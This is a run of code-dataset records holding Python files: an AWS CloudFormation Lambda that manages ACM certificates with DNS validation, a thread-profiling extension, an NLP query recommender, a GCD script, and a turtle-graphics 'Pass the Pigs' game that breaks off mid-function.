)['CertificateArn']\n add_tags()\n\n def delete_certificate(a): # delete_certificate(arn, /)\n \"\"\"\n Delete a certificate\n\n Attempts to delete a certificate.\n\n :param str a: Arn of the certificate to delete\n\n \"\"\"\n\n while True:\n\n try:\n acm.delete_certificate(**{'CertificateArn': a})\n return\n except ClientError as exception:\n log_exception('')\n\n err_code = exception.response['Error']['Code']\n\n if err_code == 'ResourceInUseException':\n if get_remaining_time_in_millis() / 1000 < 30:\n raise\n\n sleep(5)\n continue\n\n if err_code in ['ResourceNotFoundException', 'ValidationException']:\n # If the arn is invalid, it didn't exist anyway.\n return\n\n raise\n\n except ParamValidationError:\n # invalid arn\n return\n\n def find_certificate(p): # find_certificate(props, /)\n \"\"\"\n Find a certificate that belongs to this stack\n\n If the certificate is not found, returns None.\n\n :param dict p: The properties of the certificate to find\n :returns: The arn of the certificate\n :rtype: str or None\n\n \"\"\"\n\n for page in acm.get_paginator('list_certificates').paginate():\n for 
certificate in page['CertificateSummaryList']:\n log_info(certificate)\n\n if p['DomainName'].lower() == certificate['DomainName']:\n tags = {tag['Key']: tag['Value'] for tag in\n acm.list_tags_for_certificate(**{'CertificateArn': certificate['CertificateArn']})['Tags']}\n\n if (tags.get('cloudformation:' + 'logical-id') == e['LogicalResourceId'] and\n tags.get('cloudformation:' + 'stack-id') == e['StackId'] and\n tags.get('cloudformation:' + 'properties') == hash_func(p)\n ):\n return certificate['CertificateArn']\n\n def reinvoke():\n \"\"\"\n Reinvoke this lambda\n\n The time to issue a certificate may be more than the lambda can execute for.\n This reinvokes this lambda to continue waiting.\n\n If this lambda has itself been reinvoked, instead raise a RuntimeError.\n\n \"\"\"\n\n # Only Reinvoke once, which is a total of 30 minutes running\n if REINVOKED in e:\n raise RuntimeError('Certificate not issued in time')\n\n e[REINVOKED] = REINVOKED\n\n log_info(e)\n client('lambda').invoke(\n FunctionName=c.invoked_function_arn,\n InvocationType='Event',\n Payload=json_dumps(e)\n )\n\n def wait_for_issuance():\n \"\"\"\n Wait until a certificate is issued\n\n Returns True when issued, False when lambda execution time is up.\n If the certificate fails to issue, a RuntimeError is raised\n\n :rtype: bool\n\n \"\"\"\n\n while (get_remaining_time_in_millis() / 1000) > 30:\n\n cert = acm.describe_certificate(**{'CertificateArn': e['PhysicalResourceId']})['Certificate']\n log_info(cert)\n\n if cert['Status'] == 'ISSUED':\n return True\n elif cert['Status'] == 'FAILED':\n raise RuntimeError(cert.get('FailureReason', ''))\n\n sleep(5)\n\n return False\n\n def replace_cert():\n \"\"\"\n Does the update require replacement of the certificate?\n\n Only tags can be updated without replacement\n\n :rtype: bool\n\n \"\"\"\n\n old = shallow_copy(e['Old' + 'ResourceProperties'])\n old.pop('Tags', None)\n\n new = shallow_copy(e['ResourceProperties'])\n new.pop('Tags', None)\n\n return old != new\n\n def validate():\n \"\"\"\n Add DNS validation records for a certificate\n\n \"\"\"\n\n if props.get('ValidationMethod') != 'DNS':\n return\n\n while True:\n cert = acm.describe_certificate(**{'CertificateArn': e['PhysicalResourceId']})['Certificate']\n log_info(cert)\n\n if cert['Status'] != 'PENDING_VALIDATION':\n return\n\n if not [\n validation_option\n for validation_option in cert.get('DomainValidationOptions', [{}])\n if 'ValidationStatus' not in validation_option\n or 'ResourceRecord' not in validation_option\n ]:\n # All validation options have a status and resource record to create\n break\n\n sleep(1)\n\n for validation_option in cert['DomainValidationOptions']:\n\n if validation_option['ValidationStatus'] == 'PENDING_VALIDATION':\n hosted_zone = get_zone_for(validation_option['DomainName'])\n\n role_arn = hosted_zone.get('Route53RoleArn', props.get('Route53RoleArn'))\n\n sts = client('sts').assume_role(\n RoleArn=role_arn,\n RoleSessionName=('Certificate' + e['LogicalResourceId'])[:64],\n DurationSeconds=900,\n )['Credentials'] if role_arn is not None else {}\n\n route53 = client('route53',\n aws_access_key_id=sts.get('AccessKeyId'),\n aws_secret_access_key=sts.get('SecretAccessKey'),\n aws_session_token=sts.get('SessionToken'),\n ).change_resource_record_sets(**{\n 'HostedZoneId': hosted_zone['HostedZoneId'],\n 'ChangeBatch': {\n 'Comment': 'Domain validation for ' + e['PhysicalResourceId'],\n 'Changes': [{\n 'Action': 'UPSERT',\n 'ResourceRecordSet': {\n 'Name': 
validation_option['ResourceRecord']['Name'],\n 'Type': validation_option['ResourceRecord']['Type'],\n 'TTL': 60,\n 'ResourceRecords': [{'Value': validation_option['ResourceRecord']['Value']}],\n },\n }],\n }},\n )\n\n log_info(route53)\n\n def get_zone_for(n): # get_zone_for(name, /)\n \"\"\"\n Return the hosted zone to use for validating a name\n\n :param str n: The name to validate\n :rtype: dict\n\n \"\"\"\n\n n = n.rstrip('.')\n zones = {domain['DomainName'].rstrip('.'): domain for domain in props['DomainValidationOptions']}\n\n parts = n.split('.')\n\n while len(parts):\n if '.'.join(parts) in zones:\n return zones['.'.join(parts)]\n\n parts = parts[1:]\n\n raise RuntimeError('DomainValidationOptions' + ' missing for ' + n)\n\n hash_func = lambda v: hashlib.new('md5', json_dumps(v)).hexdigest()\n\n def add_tags():\n \"\"\"\n Add tags from the ResourceProperties to the Certificate\n\n Also adds logical-id, stack-id, stack-name and properties tags, which are used by the custom resource.\n\n \"\"\"\n\n tags = shallow_copy(e['ResourceProperties'].get('Tags', []))\n tags += [\n {'Key': 'cloudformation:' + 'logical-id', 'Value': e['LogicalResourceId']},\n {'Key': 'cloudformation:' + 'stack-id', 'Value': e['StackId']},\n {'Key': 'cloudformation:' + 'stack-name', 'Value': e['StackId'].split('/')[1]},\n {'Key': 'cloudformation:' + 'properties', 'Value': hash_func(e['ResourceProperties'])}\n ]\n\n acm.add_tags_to_certificate(**{'CertificateArn': e['PhysicalResourceId'], 'Tags': tags})\n\n def send_response():\n \"\"\"\n Send a response to cloudformation\n\n \"\"\"\n\n log_info(e)\n\n response = urlopen(Request(e['ResponseURL'], json_dumps(e), {'content-type': ''}, method='PUT'))\n\n if response.status != 200:\n raise Exception(response)\n\n try:\n i_token = hash_func(e['RequestId'] + e['StackId'])\n props = e['ResourceProperties']\n\n acm = client('acm', region_name=props.get('Region'))\n\n e['Status'] = 'SUCCESS'\n\n if e['RequestType'] == 'Create':\n\n if REINVOKED not in e:\n e['PhysicalResourceId'] = 'None'\n request_cert()\n\n validate()\n\n if not wait_for_issuance():\n return reinvoke()\n\n elif e['RequestType'] == 'Delete':\n\n if e['PhysicalResourceId'] != 'None':\n if e['PhysicalResourceId'].startswith('arn:'):\n delete_certificate(e['PhysicalResourceId'])\n else:\n delete_certificate(find_certificate(props))\n\n elif e['RequestType'] == 'Update':\n\n if replace_cert():\n log_info('Update')\n\n if find_certificate(props) == e['PhysicalResourceId']:\n # This is an update cancel request.\n\n # Try and delete the new certificate that is no longer required\n try:\n acm = client('acm', region_name=e['OldResourceProperties'].get('Region'))\n log_info('Delete')\n delete_certificate(find_certificate(e['OldResourceProperties']))\n except:\n log_exception('')\n\n # return success for the update - nothing changed\n return send_response()\n\n if REINVOKED not in e:\n request_cert()\n\n validate()\n\n if not wait_for_issuance():\n return reinvoke()\n else:\n if 'Tags' in e['Old' + 'ResourceProperties']:\n acm.remove_tags_from_certificate(**{\n 'CertificateArn': e['PhysicalResourceId'],\n 'Tags': e['Old' + 'ResourceProperties']['Tags']\n })\n\n add_tags()\n\n else:\n raise RuntimeError(e['RequestType'])\n\n return send_response()\n\n except Exception as ex:\n log_exception('')\n e['Status'] = 'FAILED'\n e['Reason'] = str(ex)\n return 
send_response()\n","sub_path":"src/troposphere_dns_certificate/certificate.py","file_name":"certificate.py","file_ext":"py","file_size_in_byte":12191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"358799369","text":"\nimport acm\n\nblockCalls = acm.FDictionary()\nwutCount = acm.WorkUnitThreads().PoolSize()\nstartShiftSize = 2\nendShiftSize = 256\nfactorShift = 2\nmaxBlockCalls = 100\n\ndef startMTProfiling(eii):\n blockCalls.Clear()\n hook = acm.GetFunction(\"callVAHook\", 3)\n acm.FACMServer().RegisterCallVAHook(hook)\n print (\"MT Call profiling enabled\")\n\ndef stopMTProfiling(eii):\n acm.FACMServer().RegisterCallVAHook(None)\n print (\"MT Call profiling disabled\")\n \ndef callVAHook(time, block, args):\n if block.IsMTSafe(): \n calls = blockCalls.At(block)\n if calls:\n calls.Add(args.Clone())\n else:\n calls = acm.FArray()\n calls.Add(args.Clone())\n blockCalls.AtPut(block, calls)\n \ndef runProfiling(eii):\n tester = MultiThreadTester(blockCalls)\n tester.ProcessProfiledCalls()\n tester.OutputProfilingData()\n \nclass ProfilingData:\n def __init__(self, args, numberOfThreads, cost):\n self.m_args = args\n self.m_numberOfThreads = numberOfThreads\n self.m_cost = cost\n \n def Args(self):\n return self.m_args\n \n def NumberOfThreads(self):\n return self.m_numberOfThreads\n \n def Cost(self):\n return self.m_cost\n \nclass ProfilingDataHelper:\n def __init__(self, singleData, multiData):\n self.m_singleData = singleData\n self.m_multiData = multiData\n \n def SingleData(self):\n return self.m_singleData\n \n def MultiData(self):\n return self.m_multiData\n \nclass MultiThreadTester:\n def __init__(self, blockCalls):\n self.m_timeProfiler = acm.FTimeProfiler()\n self.m_profilingDataDictionary = acm.FDictionary()\n self.m_blockCalls = blockCalls\n self.m_minimumShiftsDictionary = acm.FDictionary()\n \n def ProcessProfiledCalls(self):\n defaultContext = acm.GetDefaultContext()\n module = self.GetModuleForStorage(defaultContext)\n if module:\n if self.BlockCalls():\n for block in self.BlockCalls().Keys():\n i = 0\n self.WriteToModule(defaultContext, module, block.DocKey(), 1, \"True\")\n calls = self.BlockCalls().At(block)\n argumentsArray = acm.FArray()\n for args in calls:\n if i < maxBlockCalls:\n argumentsArray.Add(args)\n else:\n break\n i = i + 1\n self.RunTest(block, argumentsArray, startShiftSize, factorShift, endShiftSize)\n self.StoreFBlockInfoData(defaultContext, module)\n else:\n print (\"No module selected\")\n \n def RunTest(self, block, argumentsArray, start = 1, factor = 1, max = 1):\n self.StartProfiling(block)\n count = start\n self.MinimumShiftsDictionary().AtPut(block, 0)\n while count <= max:\n for args in argumentsArray:\n newArgs = self.ModifyArguments(block, args, count)\n profilingDataSingle = self.CallBlockWithThreads(block, newArgs, count, 1)\n profilingDataMulti = self.CallBlockWithThreads(block, newArgs, count, wutCount)\n profilingDataHelper = ProfilingDataHelper(profilingDataSingle, profilingDataMulti)\n self.AddProfilingData(block, count, profilingDataHelper)\n numberOfThreads = self.GetMinimumThreads(block) \n if numberOfThreads > 0:\n self.MinimumShiftsDictionary().AtPut(block, numberOfThreads)\n break\n count = count * factor\n self.EndProfiling(block)\n \n def CallBlockWithThreads(self, block, args, shifts, numberOfThreads):\n acm.WorkUnitThreads().PoolSize(numberOfThreads)\n minProfilingData = None\n i = 0\n while i < 10:\n try:\n results = block.CallVA(args)\n except:\n print (\"Could not call 
block \", block, \" with args \", args)\n acm.WorkUnitThreads().PoolSize(wutCount)\n profilingData = self.GetProfilingResults(block, args, shifts, numberOfThreads)\n self.ClearProfilingData(block)\n if 0 == i or profilingData.Cost() < minProfilingData.Cost():\n minProfilingData = profilingData\n i = i + 1\n return minProfilingData\n \n def ModifyArguments(self, block, args, totalCount):\n modifiedArgument = None\n i = 0\n newArgs = []\n blockIsMethod = block.IsKindOf(\"FMethod\")\n for arg in args:\n if (blockIsMethod and 0 == i) or modifiedArgument:\n newArgs.append(arg)\n else:\n modifiedArgument = self.GenerateVectorFromArgument(totalCount, arg)\n newArgs.append(modifiedArgument)\n i = i + 1\n if not modifiedArgument:\n print (\"No argument to modify in argument list\", args)\n return newArgs\n \n def StartProfiling(self, function):\n self.TimeProfiler().Profile(function)\n \n def EndProfiling(self, function):\n self.TimeProfiler().DropProfile(function)\n \n def GetProfilingResults(self, block, args, shifts, numberOfThreads):\n profile = self.TimeProfiler().GetProfile(block)\n profilingData = ProfilingData(args, numberOfThreads, profile.Cost())\n return profilingData\n \n def AddProfilingData(self, block, shifts, profilingData):\n shiftsDictionary = self.ProfilingDataDictionary().At(block)\n if shiftsDictionary:\n profilingDataArray = shiftsDictionary.At(shifts)\n if profilingDataArray:\n profilingDataArray.Add(profilingData)\n else:\n profilingDataArray = acm.FArray()\n profilingDataArray.Add(profilingData)\n shiftsDictionary.AtPut(shifts, profilingDataArray)\n else:\n profilingDataArray = acm.FArray()\n profilingDataArray.Add(profilingData)\n shiftsDictionary = acm.FDictionary()\n shiftsDictionary.AtPut(shifts, profilingDataArray)\n self.ProfilingDataDictionary().AtPut(block, shiftsDictionary)\n \n def ClearProfilingData(self, function):\n profile = self.TimeProfiler().GetProfile(function)\n profile.Clear()\n \n def OutputProfilingData(self):\n for block in self.ProfilingDataDictionary().Keys():\n shiftsDictionary = self.ProfilingDataDictionary().At(block)\n sortedKeys = shiftsDictionary.Keys().Sort()\n for shift in sortedKeys:\n profilingDataArray = shiftsDictionary.At(shift)\n print (\"-----------------------------------\")\n print (\"block \", block)\n print (\"shifts \", shift)\n for profilingDataHelper in profilingDataArray:\n print (\" -----------------------------------\")\n print (\" ---------Single--------------------\")\n print (\" threads \", profilingDataHelper.SingleData().NumberOfThreads())\n print (\" cost \", profilingDataHelper.SingleData().Cost())\n print (\" args \", profilingDataHelper.SingleData().Args())\n print (\" ---------Multi--------------------\")\n print (\" threads \", profilingDataHelper.MultiData().NumberOfThreads())\n print (\" cost \", profilingDataHelper.MultiData().Cost())\n print (\" args \", profilingDataHelper.MultiData().Args())\n \n def WriteToModule(self, context, module, functionString, minimumThreads, useMultiThreading):\n blockInfo = context.GetExtension(acm.FBlockInfo, acm.FBlock, acm.FSymbol(functionString))\n blockInfoTemplate = 'FBlock:' + str(functionString) + ' = \\n\\\n MT=' + useMultiThreading + ' \\n\\\n MWMT=' + str(minimumThreads) +' \\n'\n context.EditImport('FBlockInfo', blockInfoTemplate, False, module)\n module.Commit()\n\n def StoreFBlockInfoData(self, defaultContext, module):\n for block in self.MinimumShiftsDictionary().Keys():\n numberOfThreads = self.MinimumShiftsDictionary().At(block)\n if numberOfThreads > 0:\n 
self.WriteToModule(defaultContext, module, block.DocKey(), numberOfThreads, \"True\")\n else:\n self.WriteToModule(defaultContext, module, block.DocKey(), 0, \"False\")\n \n def GetModuleForStorage(self, context):\n modules = self.FilterBuiltInModules(context.Modules())\n module = None # ensure a defined return value when no module can be selected\n if modules.Size() > 0:\n module = acm.UX().Dialogs().SelectObject(acm.UX().SessionManager().Shell(), 'Select module for storing block information', 'FExtensionModule', modules, modules.At(0))\n else:\n print (\"No modules found in default context\")\n return module\n \n def FilterBuiltInModules(self, modules):\n notBuiltInModules = acm.FArray()\n if modules is not None:\n for module in modules:\n if not module.IsBuiltIn():\n notBuiltInModules.Add(module)\n return notBuiltInModules\n \n def GetMinimumThreads(self, block):\n shiftsDictionary = self.ProfilingDataDictionary().At(block)\n sortedKeys = shiftsDictionary.Keys().Sort()\n optimalWut = 0\n for shift in sortedKeys:\n profilingDataArray = shiftsDictionary.At(shift)\n multiIsBetter = self.AnalyzeProfilingDataForShift(profilingDataArray)\n if multiIsBetter and 0 == optimalWut:\n optimalWut = shift\n return optimalWut\n \n def AnalyzeProfilingDataForShift(self, array):\n totalSingleDataCost = 0.0\n totalMultiDataCost = 0.0\n for proflingDataHelper in array:\n totalSingleDataCost = totalSingleDataCost + proflingDataHelper.SingleData().Cost()\n totalMultiDataCost = totalMultiDataCost + proflingDataHelper.MultiData().Cost()\n return totalSingleDataCost > totalMultiDataCost\n \n def GenerateVectorFromArgument(self, numberOfCalls, start):\n vector = acm.FArray()\n vector.Add(start)\n i = 1\n while i < numberOfCalls:\n newValue = start\n vector.Add(newValue)\n i = i + 1\n lot = acm.GetFunction('lot', 2)(vector, 1)\n return lot\n \n def TimeProfiler(self):\n return self.m_timeProfiler\n \n def ProfilingDataDictionary(self):\n return self.m_profilingDataDictionary\n \n def BlockCalls(self):\n return self.m_blockCalls\n \n def MinimumShiftsDictionary(self):\n return self.m_minimumShiftsDictionary\n\n","sub_path":"Extensions/MultiThreadProfilingModule/FPythonCode/MTProfiling.py","file_name":"MTProfiling.py","file_ext":"py","file_size_in_byte":10870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"440609104","text":"from nltk.tokenize import word_tokenize\nfrom collections import Counter\n\nfrom ellipsis.types import exported as types\nfrom ellipsis.definitions import types_to_definitions, definition_type_count\n\n\ndef tokenize(query: str) -> [str]:\n tokens = word_tokenize(query)\n offset = 0\n for token in tokens:\n offset = query.find(token, offset)\n yield (token, offset, offset + len(token))\n offset += len(token)\n\n\ndef highlight(query: str) -> (int, int, str, str):\n result = []\n\n for (token, start, end) in tokenize(query):\n for typ in types:\n _token = typ.check(token)\n if _token is not None:\n result.append({\n 'token': _token,\n 'start': start,\n 'end': end,\n 'type': typ.name()\n })\n\n return result\n\n\ndef recommend(query: str):\n found_types = [h['type'] for h in highlight(query)]\n found_type_count = dict(Counter(found_types))\n\n recommended_definitions = {}\n\n for type_name, type_count in found_type_count.items():\n for definition_name in types_to_definitions[type_name]:\n definition_name = definition_name.name()\n if definition_name not in recommended_definitions:\n recommended_definitions[definition_name] = definition_type_count[definition_name].copy()\n\n definition = 
recommended_definitions[definition_name]\n definition[type_name] = max(0, definition[type_name] - type_count)\n\n recommended_definitions = [{'name': k, 'fields': v} for k, v in recommended_definitions.items()]\n recommended_definitions.sort(key=lambda x: sum(x['fields'].values()))\n return recommended_definitions\n","sub_path":"ellipsis/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"308242276","text":"import math\nfrom collections import Counter\n\n# Function that factors a number into a product of primes\ndef prost(x):\n res=[]\n for i in range(2,int(math.sqrt(x))+1):\n while x%i==0:\n res.append(i)\n x=x/i\n if x!=1: res.append(int(x))\n return res\n\n# Read the initial data: the count of numbers and the numbers themselves\nmy_list=[]\nsize=int(input('Enter the number of elements - '))\nfor i in range(1,size+1):\n n=int(input('Number ' + str(i) + ' - '))\n my_list.append(n)\n\n\n# Factor the entered numbers into primes\nrazl=[]\nfor i in range(size):\n razl.append(prost(my_list[i]))\n\n# Find the intersection of the resulting lists\ncommon_items = list((Counter(razl[0]) & Counter(razl[1])).elements())\nif size>2:\n for i in range(2,size):\n common_items = list((Counter(razl[i]) & Counter(common_items)).elements())\n\n# Finally, compute the GCD itself\nNOD=1\nfor i in range(len(common_items)):\n NOD=NOD*common_items[i]\n\nprint('The greatest common divisor is: ', NOD)\n","sub_path":"math/NOD_for_n_numbers.py","file_name":"NOD_for_n_numbers.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"483330829","text":"#Import libraries\r\nimport random\r\nimport turtle \r\n\r\n#**\r\n# * Chris Duncan\r\n# * Object Oriented Programming\r\n# * Spring 2020 Semester, week 8, Final Class Project\r\n# * Pig Out! The game. 
A Python version of the game Pass the Pigs.\r\n\r\n#Set variables\r\nscoreP1 = 0\r\nscoreP2 = 0\r\nglobal turn\r\nturn = 0\r\nglobal playagain\r\nplayagain = 'y'\r\nglobal player\r\nplayer = 1\r\n\r\n#Set up graphical display\r\ndraw=turtle.Turtle()\r\ndraw.pensize(5) \r\n\r\n#Pig renderings\r\ndef sider():\r\n x = random.randint(-300, 300) #Random placing of shapes on canvas\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.forward(150) \r\n draw.right(90)\r\n draw.forward(100)\r\n draw.right(90) \r\n draw.forward(150) \r\n draw.right(90)\r\n draw.forward(100)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.left(180)\r\n draw.forward(50)\r\n draw.left(90)\r\n draw.forward(70)\r\n draw.pendown()\r\n if pigRoll.spot == 1: #Determines if pig is showing a dot on its side\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef razorback():\r\n x = random.randint(-300, 300)\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.left(105)\r\n draw.forward(150) \r\n draw.right(215)\r\n draw.forward(155)\r\n draw.left(110) \r\n draw.forward(90) \r\n draw.left(140)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.left(10)\r\n draw.forward(50)\r\n draw.pendown()\r\n if pigRoll.spot == 1:\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef trotter():\r\n x = random.randint(-300, 300)\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.left(25)\r\n draw.forward(150) \r\n draw.right(115)\r\n draw.forward(100)\r\n draw.right(105) \r\n draw.forward(137) \r\n draw.right(40)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.right(125)\r\n draw.forward(100)\r\n draw.pendown()\r\n if pigRoll.spot == 1:\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef snouter():\r\n x = random.randint(-300, 300)\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.right(105)\r\n draw.forward(150) \r\n draw.left(215)\r\n draw.forward(155)\r\n draw.right(110) \r\n draw.forward(90) \r\n draw.left(40)\r\n draw.penup()\r\n draw.back(50)\r\n draw.pendown()\r\n if pigRoll.spot == 1:\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef leaner():\r\n x = random.randint(-300, 300)\r\n y = random.randint(-300, 300)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.pendown()\r\n draw.left(25)\r\n draw.forward(150) \r\n draw.right(115)\r\n draw.forward(65)\r\n draw.right(90) \r\n draw.forward(135) \r\n draw.right(40)\r\n draw.penup()\r\n draw.setpos(x,y)\r\n draw.right(130)\r\n draw.forward(100)\r\n draw.pendown()\r\n if pigRoll.spot == 1:\r\n draw.circle(5)\r\n draw.penup() \r\n draw.home() \r\n draw.ht()\r\n draw.st()\r\n\r\ndef oinker(): #Draws a pig face when player loses all points\r\n draw.home()\r\n #head\r\n n = 6\r\n draw.pencolor('red')\r\n for i in range(n): #Loop to minimize amount of code needed for polygon\r\n draw.forward(100) \r\n draw.right(360/n) #determining the exterior angle of the polygon\r\n draw.penup()\r\n draw.home()\r\n draw.pencolor('blue')\r\n #nose R\r\n draw.right(50)\r\n draw.forward(115) \r\n draw.pendown() \r\n for i in range(n): \r\n draw.forward(12) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home()\r\n #nose L\r\n draw.right(100)\r\n draw.forward(35)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(12) \r\n draw.right(360/n) \r\n draw.penup()\r\n 
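#the ears and eyes below reuse the same hexagon loop at smaller sizes\r\n 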
draw.home()\r\n #ear L\r\n draw.right(175)\r\n draw.forward(5)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(30) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home()\r\n #ear R\r\n draw.right(15)\r\n draw.forward(60)\r\n draw.left(65)\r\n draw.forward(55)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(30) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home()\r\n #eye L\r\n draw.right(260)\r\n draw.back(45)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(6) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.home()\r\n #eye R\r\n draw.forward(75)\r\n draw.left(90)\r\n draw.back(45)\r\n draw.pendown()\r\n for i in range(n): \r\n draw.forward(6) \r\n draw.right(360/n) \r\n draw.penup()\r\n draw.goto(-300,-300)\r\n draw.st()\r\n\r\ndef instructions(): #Displays instructions at start of game\r\n print ('Here are the rules of Pig Out - aka Pass the Pigs:')\r\n print ('Each player is trying to get to a score of 100')\r\n print ('A player may roll or pass')\r\n print ('Each turn involves one player throwing two model pigs, each of which has a dot on one side.\\nThe player gains or loses points based on the way the pigs land.\\nEach turn lasts until the player throwing either rolls the pigs in a way that wipes out their current score (one sider with a dot and one without), or decides to stop their turn.')\r\n print ('Sider - The pigs are on their sides, either both with the spot facing upward or both with the spot facing downward - 1 Point')\r\n print ('Double Razorback - The pigs are both lying on their backs - 20 Points')\r\n print ('Double Trotter - The pigs are both standing upright - 20 Points')\r\n print ('Double Snouter - The pigs are both leaning on their snouts - 40 Points')\r\n print ('Double Leaning Jowler - The pigs are both resting between snouts and ears - 60 Points')\r\n print ('Pig Out - If both pigs are lying on their sides, one with the spot facing upwards and one with the spot facing downwards, the score for that player is reset to 0 and the turn changes to the next player')\r\n print ('Oinker - If both pigs are touching in any position, then the total score is reset to 0 and the turn changes to the next player')\r\n print ('Mixed Combo - A combination not mentioned above is the sum of the single pigs\\' scores')\r\n print (' Razorback - The pig is lying on its back - 5 Points')\r\n print (' Trotter - The pig is standing upright - 5 Points')\r\n print (' Snouter - The pig is leaning on its snout - 10 Points')\r\n print (' Leaning Jowler - The pig is resting on its snout and ear - 15 Points')\r\n print ('Good Luck!')\r\n print (' ')\r\n\r\ndef pigRoll(): #Function for rolling the pigs and calling the proper rendering. \r\n pigRoll.wipe = 0\r\n pigRoll.passPig = 0\r\n matchingDot = 0\r\n rollP1 = random.randint(0,100) #Random number for Pig 1\r\n rollP1dot = random.randint(1,3) #Determine if Pig 1 has a dot on its side\r\n rollP2 = random.randint(0,100) #Random number for Pig 2\r\n rollP2dot = random.randint(1,3) #Determine if Pig 2 has a dot on its side\r\n if (rollP1dot == rollP2dot) or (rollP1dot + rollP2dot == 5):\r\n matchingDot = 1\r\n if rollP1 == 0:\r\n rollP2 = 0\r\n if rollP2 == 0:\r\n rollP1 = 0\r\n \r\n # Determine which rendering to call and collect points for scoring \r\n # Pig 1\r\n draw.clear() \r\n draw.pencolor('red')\r\n if rollP1 == 0:\r\n print ('You rolled an Oinker! 
Your score is reset to zero.')\r\n pigRoll.score1 = 0\r\n pigRoll.wipe = 1\r\n oinker()\r\n rollP1 = 999\r\n if rollP1 < 65: #Random number range is weighted to give rolls real-world relative frequencies\r\n print (\"First Pig is a sider\")\r\n shape1 = \"sider\"\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 0 and rollP1 < 65) and (rollP2 > 0 and rollP2 < 65) and (matchingDot == 1): # determines if the same pig shape was rolled with matching dots (or no dots) on both pigs, which is worth bonus points\r\n pigRoll.score1 = 1\r\n else:\r\n pigRoll.score1 = 0\r\n sider()\r\n rollP1 = 999\r\n if rollP1 < 88:\r\n print (\"First Pig is a Razorback\")\r\n shape1 = \"razor\"\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 64 and rollP1 < 88) and (rollP2 > 64 and rollP2 < 88):\r\n pigRoll.score1 = 20\r\n else:\r\n pigRoll.score1 = 5\r\n razorback()\r\n rollP1 = 999\r\n if rollP1 < 96:\r\n print (\"First Pig is a Trotter\")\r\n shape1 = \"trot\"\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 87 and rollP1 < 96) and (rollP2 > 87 and rollP2 < 96):\r\n pigRoll.score1 = 20\r\n else:\r\n pigRoll.score1 = 5\r\n trotter()\r\n rollP1 = 999\r\n if rollP1 < 99:\r\n print (\"First Pig is a Snouter\")\r\n shape1 = 'snout'\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 95 and rollP1 < 99) and (rollP2 > 95 and rollP2 < 99):\r\n pigRoll.score1 = 40\r\n else:\r\n pigRoll.score1 = 10\r\n snouter()\r\n rollP1 = 999\r\n if rollP1 < 101:\r\n print (\"First Pig is a Leaning Jowler\")\r\n shape1 = 'lean'\r\n if rollP1dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if (rollP1 > 98 and rollP1 < 101) and (rollP2 > 98 and rollP2 < 101):\r\n pigRoll.score1 = 60\r\n else:\r\n pigRoll.score1 = 15\r\n leaner()\r\n rollP1 = 999\r\n \r\n # Pig 2\r\n draw.pencolor('blue')\r\n if rollP2 == 0:\r\n pigRoll.score2 = 0\r\n rollP2 = 999\r\n if rollP2 < 65:\r\n print (\"Second Pig is a sider\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n pigRoll.score2 = 0 #single siders never score on their own\r\n if shape1 == 'sider' and matchingDot == 0:\r\n pigRoll.passPig = 1\r\n sider()\r\n rollP2 = 999\r\n if rollP2 < 88: #thresholds mirror Pig 1 so the double-shape bonus checks line up\r\n print (\"Second Pig is a Razorback\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if shape1 == 'razor':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 5\r\n razorback()\r\n rollP2 = 999\r\n if rollP2 < 96:\r\n print (\"Second Pig is a Trotter\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 0\r\n if shape1 == 'trot':\r\n pigRoll.score2 = 0\r\n else:\r\n pigRoll.score2 = 5\r\n trotter()\r\n rollP2 = 999\r\n if rollP2 < 99:\r\n print (\"Second Pig is a Snouter\")\r\n if rollP2dot == 1:\r\n pigRoll.spot = 1\r\n else:\r\n pigRoll.spot = 